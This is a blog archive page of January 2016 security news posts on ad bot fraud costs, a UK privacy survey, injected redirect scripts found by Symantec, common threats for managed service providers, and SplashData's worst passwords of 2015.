Month: January 2016

Cost of Bot Fraud to Rise to 7 Billion in 2016

The cost of bot fraud in 2016 is likely to rise to a staggering $7.2 billion, according to a new report by the Association of National Advertisers (ANA).

2015 Bot Baseline study places the cost of bot fraud at over $7 billion

The study, conducted in conjunction with WhiteOps, shows that despite efforts to reduce the impact of bot fraud, criminal gangs are still managing to game the online advertising industry. Advertisers are being tricked into thinking that real visitors are viewing their adverts and are paying for those visits, when in actual fact a substantial percentage come from bots.

For some companies the losses were shocking. The highest losses were reported to have cost one company $42 million over the course of the year. However, even smaller companies did not escape unscathed. The cost of bot fraud for the least affected advertiser was $250,000.

ANA studied 1,300 advertising campaigns conducted by 49 major companies over a period of two months from August 1, 2015., to September 30, 2015. The results of the study were then extrapolated to provide the cost of bot fraud for 2016.

The study examined more than 10 billion ad impressions to determine the percentage that were real visitors. To distinguish bot visits from the human visits, ANA/WhiteOps added detection tags to the advertising campaigns under study.

The same study was conducted back in 2014 and this year’s results show that virtually nothing has changed, with just a fall in bot fraud of just 0.2% registered. The level of bot fraud has remained constant, although the cost to companies has increased.

In 2014, online advertisers were estimated to have lost around $5 billion to bot fraud, with the rise in cost of bot fraud due to an expected increase in advertising investment over the course of the next 12 months.

Last year, brands suffered an average of $10 million in losses to bot fraud. That’s an average of $10 billion paid to advertise to bots. For 25% of companies, 9% of impressions go to non-human traffic.

Methods of bot detection have improved, but they are clearly not having much of an effect on the cost of bot fraud for advertisers. As detection methods improve, bot operators have improved their ability to obfuscate their bot visits.

Unfortunately, it is difficult to distinguish bot traffic from real traffic as more residential IP addresses are being used, and the bots are becoming better at mimicking real browsing habits.

Data Privacy Concerns in Britain Highlighted by New Study

A new study has revealed that British consumers are becoming increasingly worried about how companies are using the data they provide online. Data privacy concerns in Britain are now at a level where more people worry about their data and how it is being used than about losing their main source of income.

The National Cyber Security Alliance GB Consumer Privacy Index/TRUSTe study results were released in time for European Data Protection Day on January, 28: An international day which aims to improve consumer awareness of data privacy issues, and encourages businesses to do more to ensure that stored data are properly protected.

Now in its tenth year, Data Protection Data (Data Privacy Day in the United States), is recognized by over 47 EU countries. A number of privacy initiatives are launched on January 28, and efforts are made to improve awareness of the types of data that are being collected on consumers, how they are being used, and the risks that come from providing those data to companies.

This year, there is a major focus on increasing awareness of how companies are sharing the data that are provided to them by consumers.

Study reveals major data privacy concerns in Britain

The online survey, conducted by Ipsos, took a representative sample of 1,000 individuals in the UK and probed attitudes to data privacy and the measures currently being adopted by consumers to protect online privacy. Respondents were asked about online browsing habits from a privacy perspective, and trust issues they had with websites and web applications.

955 respondents said they were concerned about their privacy online and 364 respondents said they had stopped using an app or website in the past 12 months due to privacy concerns. For many of the respondents, online privacy was such a concern that they worried more about the use and exposure of their data than losing their primary source of income. British online privacy concerns ranked 10 percentage points higher than the fear of loss of the main source of income.

Concern can be explained, in part, by the lack of transparency about how consumer data is being used by companies, and with whom they are being shared. 1 in 4 respondents claimed not to know how companies were using and sharing their data.

Privacy fears were shown to be affecting how consumers view businesses and appear to influence the use of online services. Of the individuals who were concerned about their online privacy, 76% limited their online activities as a result.

The lack of transparency about how data is used can have a serious impact on business. 89% of respondents said they avoid companies that they do not believe will do enough to protect their privacy. The message to businesses is: Fail to explain what is done with data and consumers will take their business elsewhere.

How are British privacy concerns affecting online activity?

The survey examined privacy concerns in Britain and how those concerns affected online activity in the past 12 months.

  • 46% claimed to have withheld personal information from online companies
  • 23% stopped an online transaction due to privacy concerns
  • 53% did not click on an advert as they were worried about their privacy
  • 31% avoided downloading an app or product due to a perceived privacy risk

More than half of respondents (54%) do not trust businesses to be able to store and protect their personal information online and 51% said they do not feel they are in control of their online data.

One of the ways that companies can improve trust is by allowing consumers to remove their data on request. 43% said that they would trust a company more if they were made aware how they could remove personal information if they so required.

Interestingly, while data privacy concerns in Britain are high, the majority of respondents did little to protect their privacy. For instance, 58% of respondents were aware they could delete cookies from their computers, yet only 49% did. Location tracking on Smartphones can be turned off and 44% of respondents were aware of this, yet only 28% actually disabled the feature. Only 12% of respondents read privacy policies, yet 31% claimed that they knew that they could be read.

With data privacy concerns in Britain so high, businesses that fail to do enough to secure data and protect consumer privacy are likely to lose out to companies that do. Furthermore, once online trust is lost, it can be difficult to regain.

Hidden Scripts on Servers Redirecting Users to Malicious Websites

Anti-virus software company Symantec has uncovered a new global web server infection. Hidden scripts on servers are redirecting website visitors to potentially malicious websites. So far over 3,500 hidden scripts on servers have been identified, which are being triggered when website visitors land on the compromised site. That visitor is then directed to a potentially malicious website.

This is a mass injection on a truly global scale. Hidden scripts on servers in over 75 countries have been discovered, although almost half of the compromised websites are located in the United States. 47% of infections were discovered in the U.S., 12% were discovered on servers in India, with the UK, Italy, and Japan accounting for 6% each. France, Canada, and the Russian Federation each had 5% of infections, with 4% discovered in Australia and Brazil.

The majority of compromised websites were used by businesses, and .edu, .gov, and other government websites had also been compromised.

Hidden scripts on servers pose a significant threat to website visitors

At the present moment in time the scrips have not been found to direct users to websites where drive-by malware downloads occur, nor have visitors been redirected to websites infected with malware. However, there is considerable potential for criminals to alter the scripts to deliver visitors to websites capable of delivering malware. A network of servers could be being built for a future global attack.

The malicious code injection can be found before the </head> tag. The injected JavaScript code set to run 10 seconds after the user’s browser has loaded the page. The script is used to launch multiple other scripts to mask the action from the visitor.

The scripts are understood to currently be used to collect data on users, which Symantec lists as including host IP address, Flash version, referrer, search term queries, page title, monitor resolution, user language, and URL page address. The hidden scripts could potentially be used for a wide range of malicious purposes.

All of the infections so far detected have affected a specific website content management system, although that CMS has not been disclosed. All website administrators are advised to check their websites and search for any injected code.

Should any code be located, it is not just a case of changing the administrator password and removing the script from the site. Backdoors may also have been installed and full webserver sanitization is likely to be required to totally remove the infection.

Common Data Security Threats MSPs Must Address

MSPs must not forgot to address the following common data security threats if they are to keep their clients protected from cyberattacks.

Failure to prevent malware & ransomware installation can be an expensive business. Multi-million-dollar liability lawsuits may follow if insufficient security measures have been implemented to prevent a cyberattack.

Unfortunately, all too often too little is done to keep networks protected from these common data security threats.

Common data security threats MSPs must address!

Listed below are five common data security threats that must be addressed by MSPs, yet they are all too often overlooked.

Anti-phishing protection is essential

Employees have long been known to be a major security risk. There will always be at least one employee in an organization who is a little green when it comes to protecting themselves and their work computer from hackers.

Any organization that fails to adequately protect against the risk of employee errors compromising the network will suffer a network security incident sooner rather than later. One of the biggest mistakes made is employees responding to phishing emails.

Employees must be made aware of the high risk of phishing. Hackers are now targeting individual employees with highly sophisticated campaigns. Targets are researched via Facebook and other social media networks, the senders of emails have their names and addresses spoofed, and clever campaigns are devised to get end users to download malware or visit malicious websites. Regular training on basic security such as phishing avoidance and scam email identification is therefore essential.

Take control of mobile devices used to connect to the network

Phishing is far from the only employee security risk. Employees are now bringing their own devices to work, and these devices pose a major security risk if not effectively managed. If a single employee manages to get their own personal device infected with malware, the infection could all too easily spread to a corporate network.

It is therefore essential not only to limit the individuals who are able to use personal devices for work purposes, but to ensure that any device used for work purposes is routinely monitored.

If employees are permitted to use personal devices for work, or remove laptop computers from company premises, it is essential that sensitive data stored on those devices is encrypted. Mobile devices are frequently lost or stolen and represent a considerable data security risk.

Prepare for a wave of malware attacks on Macs

Over the past few years, using a Mac meant you were protected from malware and viruses; however, last year new malware started to appear that specifically targeted Apple devices. While anti-malware protection for Macs was something that could previously be ignored, that is now no longer the case.

The volume of malware targeting Macs is expected to continue to increase this year as Apple’s market share grows. It is now important for all organizations to start preparing for a new wave of Mac attacks.

Implement a robust web filtering solution

Cybercriminals are increasing using legitimate websites to serve malware to website visitors. Recently, the MSN home page was discovered to be hosting malvertising, showing that even some of the biggest internet sites may not be entirely safe. It is therefore essential to implement a web filtering solution that can block malvertising, as well as malicious websites known to deliver drive-by malware payloads.

To keep users and networks protected, it is essential to implement safe search, block pharming URLs, malware and phishing sites, tunneling software, and malicious adverts. To avoid negative impact on the business, use a web filtering solution such as WebTitan, which offers a high degree of granularity. This will allow different individuals and users to be assigned different privileges to maximize protection and minimize the negative impact on the business.

Develop patch management policies and plug security holes promptly

Zero-day security vulnerabilities are being discovered on an almost daily basis. Once identified, exploits are rapidly shared via Darknet communities. If security vulnerabilities are allowed to remain, it is only a matter of time before they will be used for an attack. It is therefore essential that software is kept up to date and patches are installed as soon as they are released.

However, due to the sheer volume of devices, applications, operating systems, and plugins now in use, keeping on top of all of the upgrades and patches can be overwhelming. Patches must be found, installed, and tested, and all procedures must be documented for compliance purposes. Due to the security risk posed by out of date software, if the task of managing patches is becoming unmanageable, it may be time to consider using an automated patch management solution.

Worst Passwords of 2015 Revealed

If you want to keep your accounts secure, it is probably best not to use the word password as your password. However, you could do worse according to a list of the worst passwords of 2015 that has recently been published. 123456 is a much worse choice.

The list of the worst passwords of 2015 would be comical were it not for the fact that so many people actually use these words, phrases, and numerical sequences to (barely) secure their accounts. Send the list around your organization and you may even hear a few gasps as users open the document to discover that their cunning password has been revealed to the masses.

The worst passwords of 2015 list contains some absolute howlers, but also some that users may think are actually quite. Sadly though, passw0rd is not that difficult for a hacker to guess. 1qaz2wsx is better, but not by much. That also makes it onto this year’s top 25 list.

Unsurprisingly with a new Star Wars film having just been released there are a few new entries along that theme. Solo makes it on the list, as does Princess, and StarWars. Minus the capital letters of course. Leia is not on there, but that does not mean it is a good choice either.

People are very bad at choosing passwords

The list of the worst passwords of 2015 serves as a reminder that we are very bad at choosing passwords. We would all like a password that is easy to remember and can be used across all accounts, especially hackers.

Even if a password does not make it into the top 25 list of the worst passwords of 2015, instead it earned place 499, it would not keep an account secured for long if a hacker attempts to crack it. Password dictionaries are compiled, updated, and used by hackers to gain access to accounts, and it doesn’t take long to run through a list of the top 1000 password choices and try them all. If a word is in the Oxford or Merriam Webster English dictionary it will be on a hackers list as well.

The best approach to take when choosing a password is to make sure it can’t actually be remembered very easily. The longer and more complicated the password is, the harder it will be for a hacker to crack it. Special characters must be used, numbers, capital letters, and lower case as well. Since some end users will ignore this advice, it is essential to enforce the minimum number of characters and the use of capitals, numbers, and special characters.

According to SplashData, the company that compiled the list of the worst passwords of 2015, in order to keep accounts secure it is essential to create one that is hard to remember for all accounts, and to use a password manager so they do not need to be remembered. The company suggests the use of its own one of course.

However, the most popular password manager – LastPass – was recently shown not to be as secure as people may think. Hackers could all too easily spoof the viewport and obtain even the most difficult-to-guess password.

A complex, difficult-to-guess password for each site along with a password manager to help remember it is a good option, and it will help to keep accounts secure and will save sys admins from having to keep resetting user passwords.

However, the password itself is the problem really. That is what really needs to be changed. Any password-based security system is vulnerable and even two-factor authentication is not infallible.

The best choice for keeping accounts secure is to use biometric factors to verify identity, but sadly, at present the technology is too expensive for many companies to implement. The good news is the technology is becoming cheaper and before the decade is out an alternative to passwords could well be affordable enough for many businesses to implement. We will then finally be well on our way to consigning passwords to the history books.

SpashData’s List of list of the worst passwords of 2015

Listed below is SpashData’s list of the worst passwords of 2015, together with the list for 2014 for comparison. You can see that even with the increase in reported hacking incidents, many people are still choosing unsecure passwords.

the worst passwords of 2015